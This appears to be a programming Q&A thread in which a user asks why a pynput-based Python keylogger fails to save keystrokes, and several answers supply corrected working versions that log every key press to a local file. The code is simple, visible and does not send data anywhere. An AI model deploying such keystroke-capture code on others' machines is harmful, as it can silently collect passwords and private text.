# Python keylogger won't save keystrokes to file

Tags: python

The program runs fine, though it won't save my keystrokes to `keylogger.txt`

```
from pynput.keyboard import Key, Listener

keys = []
count = 0

def key_pressed(key):
    global keys, count
    keys.append(key)
    count += 1
    print(key)

def write_to_file(keys):
    with open("keylogger.txt", "a") as f:
        for key in keys:
            f.write(str(keys))
if count == 1:
    count = 0
    write_to_file(keys)
    keys = []

with Listener(on_press=key_pressed) as listener:
    listener.join()
```

Where is the problem in my code?

Answer (score 1):

Your `write_to_file` code never runs. You change the value of `count` but you don't run write_to_file again. Put a `write_to_file` call inside `key_pressed` block and it will happen.

Answer (score 1):

I'm not entirely sure of the "buffering" that's happening in your code, but here's how I would do it:

```py
from pynput.keyboard import Key, Listener

def key_pressed(key):
    print(key)
    with open("keylogger.txt", "a") as f:
        f.write(str(key) + "\n")

with Listener(on_press=key_pressed) as listener:
    listener.join()
```

The if statement in your code executes only once, so your write_to_file function is never called.

Answer (score 0):

Problem is this part of your code.

```
if count == 1:
    count = 0
    write_to_file(keys)
    keys = []
```

This block in your code never runs.

**If you want to use same format of your code use this. But a simpler approach is attached below**

```
from pynput.keyboard import Key, Listener
keys = []
count = 0
def key_pressed(key):
    global keys, count
    keys.append(key)
    count += 1
    print(key)
    if count == 1:
        count = 0
        write_to_file(keys)
        keys = []

def write_to_file(keys):
    with open("keylogger.txt", "a") as f:
        for key in keys:
            f.write(str(keys))


with Listener(on_press=key_pressed) as listener:
    listener.join()
```

**Another implementation for the same**

```
from pynput.keyboard import Key, Listener

def key_pressed(key):
    # Stop listener
    if key == Key.esc:
        return False
    with open("keylogger.txt", "a") as f:
        f.write(str(key))
    

with Listener(on_release=key_pressed) as listener:
    listener.join()
```